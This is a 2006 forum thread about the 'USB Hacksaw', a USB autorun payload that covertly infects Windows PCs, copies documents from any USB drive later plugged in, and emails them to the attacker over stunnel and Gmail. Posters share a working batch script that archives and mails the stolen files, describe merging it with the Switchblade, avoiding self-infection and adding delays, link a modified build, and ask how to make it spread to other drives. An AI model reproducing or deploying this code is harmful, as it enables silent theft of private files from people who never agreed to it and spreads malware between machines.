Darren Kitchen Posted October 6, 2006 Posted October 6, 2006 Released on HAK.5 Episode 2x03 -- The USB Hacksaw is an evolution of the popular USB Switchblade that uses a modified version of USBDumper, Blat, Stunnel, and Gmail to automatically infect Windows PCs with a payload that will retriev documents from USB drives plugged into the target machine and securely transmit them to an email account. Proof of concept code shows how to deliver the payload instantly with a U3 autorun hack borrowed from the USB Switchblade on Windows 2000 or higher computers running as administrator or guest. Automatic propogation to other USB devices is possible however was not shown on Episode 2x03. More in the show notes here: http://www.hak5.org/wiki/USB_Hacksaw Quote
hauser Posted October 6, 2006 Posted October 6, 2006 to fix all those ulgy blat commands in the send.bat file replace with one cleaner line useing the for command. :: Configure Email Options SET emailfrom= SET emailto= SET password= :: Archive documents in 1MB chunks rar a goodies.rar .docs -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel GOTO badhack :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs :: Delete archive del /q /f goodies*.* GOTO end :badhack REM Damn this is crude. Welcome to sleepless, I don't give a rats ass, just work damnit, hacking kids! REM See show notes at http://www.hak5.org/wiki/USB_Hacksaw for a better method to do this. I'm not proud of it. for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :end Quote
armadaender Posted October 6, 2006 Posted October 6, 2006 Now I havn't watched the ep yet (will do once home from work) but can the target files to be copied and sent back be changed? I.E. targeting only files in "My Documents" or specifically certain log files for programs? Quote
therian16 Posted October 6, 2006 Posted October 6, 2006 A couple of questions Is there a way to make this a timed thing? example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted. everytime the payload gets run I recieve the file in Gmail but when I try to open it, I get an error the file is unknown format or currupt. Anyone else getting this? Is there a way to make the payload NOT run on my Hacksaw? Everytime I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted. Any ideas? Quote
DLSS Posted October 6, 2006 Posted October 6, 2006 how bout the amish type version , i hoped i could change the stuff but i cant fully understand wot is doing wot how (are there files missing ?? ) Quote
Darren Kitchen Posted October 6, 2006 Author Posted October 6, 2006 A couple of questionsIs there a way to make this a timed thing? example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted. everytime the payload gets run I recieve the file in Gmail but when I try to open it, I get an error the file is unknown format or currupt. Anyone else getting this? Is there a way to make the payload NOT run on my Hacksaw? Everytime I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted. Any ideas? for development and testing purposes I've included an uninstaller in the antidote directory. Also hold the shift key while inserting your usb drive to have it not infect your system again. but no, the sbs.exe will rip the contents of a removeable drive regardless. obviously the code can be changed to only copy certain files, etc. Quote
therian16 Posted October 6, 2006 Posted October 6, 2006 The problem that I was refering to aardwolf is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a usb? If so just ignore wip and my problem is solved. Also you mention there is a way to only grab certaing types of documents, how is that set up? Quote
PoyBoy Posted October 7, 2006 Posted October 7, 2006 Oh boy oh boy. I cant wait to see the direction this takes... Whats next? a USB pressure cooker? Quote
therian16 Posted October 7, 2006 Posted October 7, 2006 I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself: 1. copied SBS to CMD folder as required 2. created a hacksaw.bat with the go.cmd from the hacksaw payload 3. added <call hacksaw.bat> to the top of the Switchblade go.cmd 4. to protect my personal computer I created a file called test.txt at c:test.txt 5. in the hacksaw.bat I added this line to the top if exist c:test.txt goto end and created the :end tag at the bottom. This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own . One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get system time, then add say 5-15 minutes, then have sbs execute? that would get rid of sending your own Hacksaw program to yourself. Quote
fuzion8 Posted October 7, 2006 Posted October 7, 2006 I cant believe the luck, some guy came in and traded me a 2GB Scamdisk Micro for a power supply... *edit Must RTFM before asking dumb questions... Quote
arkon Posted October 7, 2006 Posted October 7, 2006 This just keeps getting scarier. If you now take the code used for "podslurping" you can run a routine that searches for all Excel files, PDF documents, Word docs etc and email those off as well. To get really blackhat it would not take much to then also automatically run these security applications that run off of a USB drive: http://www.watchyourend.com/2006/03/22/por...on-a-usb-drive/ And email the results off scans outside the network. Quote
xFilthyxJesusx Posted October 7, 2006 Posted October 7, 2006 How can i use ahmish's version of this.... do i go to the switchblade and just replace the files with these? Quote
DLSS Posted October 7, 2006 Posted October 7, 2006 How can i use ahmish's version of this.... do i go to the switchblade and just replace the files with these? unfortunately no tht wont work correctly and even wen modding it a lil it still tends to hide ure files in the maindir of yer stick and make em systemfiles for some reason .... Quote
xFilthyxJesusx Posted October 7, 2006 Posted October 7, 2006 Well that would be a good thing. Im going to try and edit it and see what I can do. In the episode they said it was possible. Ill see what I come up with. Quote
DLSS Posted October 7, 2006 Posted October 7, 2006 Well that would be a good thing. Im going to try and edit it and see what I can do. In the episode they said it was possible. Ill see what I come up with.it is but the problem is it will only work if u autorun the go directlyifu do it thru nircmd in ure maindir it will copy ure maindir to that folder instead of the needed files .... ifu do cal the go.cmd directly its obviously visible ... i'm gonna try n see if i can make a silent installer wich first copy's the files to a windows directory adn then runs the go.cmd invisible (if possible) i did something similar b4 but tht was only useing cmd's and ftp's ... ps anyone thought bout making it uber tiny by just useing a cmd and ftp file + nircmd that way u can just have those placed on his hdd , connnect to a ftp dload the files needed , delete itself and run . (a tactic i use @ school for a lot of stuff cos they block web acces but i can still acces my ftp thru commandline) Quote
xFilthyxJesusx Posted October 7, 2006 Posted October 7, 2006 Well I did it. So here.... http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar NonU3 working. Just obviously copy this to the root of your drive. I upped the file size of the rar's to 10m because i dont want a bunch of little 1mb files in my inbox. I also renamed googies to BackUp. I'm wondering what the cmd option is to enter in the computer name.... like %appdata% gives the link to appdata. I know theres one for the computer name aswell. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time. Cheers kids. Quote
DLSS Posted October 7, 2006 Posted October 7, 2006 Well I did it.So here.... http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar NonU3 working. Just obviously copy this to the root of your drive. I upped the file size of the rar's to 10m because i dont want a bunch of little 1mb files in my inbox. I also renamed googies to BackUp. I'm wondering what the cmd option is to enter in the computer name.... like %appdata% gives the link to appdata. I know theres one for the computer name aswell. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time. Cheers kids. that would be %computername% Quote
xFilthyxJesusx Posted October 7, 2006 Posted October 7, 2006 I thought so. Thank you... Now to make it work while deleting and uploading. Because of the Send.bat Quote
foikerz Posted October 7, 2006 Posted October 7, 2006 Hi ppl. Thankz for the nonU3usb chainsaw it came really handy. Since its my first post I'll go nice and smooth :). A minor correction at Jesu's code: you left the del goodies part instead of BackUp so that's it. The correct code would be : WIPSBSsend.bat :: Delete archive del /q /f BackUp*.* GOTO end Futhermore, I'm having problems with it. The first time it backed up and sent me the email but the thing is that it wont do it again. I'm trying to figure it out so if you think of something feel free to inform me. Peace out. :) Quote
xFilthyxJesusx Posted October 8, 2006 Posted October 8, 2006 Ya I noticed that too. I fixed it for myself and forgot to reupload the rar. Sorry about that guys. Quote
sircrumpet Posted October 8, 2006 Posted October 8, 2006 ok - my one concern here (and i havent tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then theres the problem of the 2ish GB limit on Gmail. Quote
PoyBoy Posted October 8, 2006 Posted October 8, 2006 /The wrench is currently alling toward the gears. Will someone catch it? Quote
spektormax Posted October 8, 2006 Posted October 8, 2006 http://hak5.org/forums/viewtopic.php?t=2889 This is a combo of haksaw, switchblade, VNC, and Nmap?? cheack it out Quote
core-dump Posted October 8, 2006 Posted October 8, 2006 ok - my one concern here (and i havent tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then theres the problem of the 2ish GB limit on Gmail. Filter volume by used space, or filter the volume's directory-tree based on target file extension(s) and size. Quote
G-Stress Posted October 8, 2006 Posted October 8, 2006 Was wondering how this code could be modified to once a machine is infected to be copied back to any usb drive and infect it with the same payload, also if so and say that's the scenario. Who knows what usb drive will be plugged in and if it will be non-u3 or u3 and also if that's the case what about digital card reader's connected via usb and other usb media? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.